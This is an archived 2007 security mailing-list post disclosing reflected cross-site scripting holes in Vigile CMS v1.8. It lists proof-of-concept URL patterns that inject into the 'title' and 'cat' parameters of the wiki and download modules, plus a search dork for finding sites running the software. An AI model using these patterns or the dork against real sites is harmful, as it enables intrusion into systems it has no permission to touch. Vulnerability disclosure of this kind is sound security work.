Hosting Provided By

Vigile CMS v1.8 Multiple Remote XSS Vulnerability

From: <x0kster(at)gmail.com>
Date: Thu Sep 20 2007 - 14:18:48 EDT

# Name : Vigile CMS v1.8 Multiple Remote XSS Vulnerability
# Download : http://www.itcms.it/
# Date : 20-09-2007
# Author : x0kster
# Mail : x0kster@gmail.com
# Note : For works, the wiki or the download module must be installed in the site.
#
# PoCs :
#
# Wiki 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[WIKINAME]&title=[XSS]
# Wiki 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[WIKINAME]?title=[XSS]
# Download 1 : http://[SITE]/[VIGILE_CMS_PATH]/index.php?nav=[DOWNLOADNAME]&cat=[XSS]
# Download 2 : http://[SITE]/[VIGILE_CMS_PATH]/index.php/nav=[DOWNLOADNAME]/cat=[XSS]
#
#
# Dork : "tutti i contenuti, notizie, e commenti sono anche opera degli utenti, ogni violazione sarà eliminata dietro segnalazione."
Received on Thu Sep 20 15:19:13 2007

This message: [ Message body ]
Next message: Raphael Marichez: "[ GLSA 200709-13 ] rsync: Two buffer overflows"
Previous message: Aditya K Sood: "Re: 0day: PDF pwns Windows"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Sun Oct 28 2007 - 06:16:34 EDT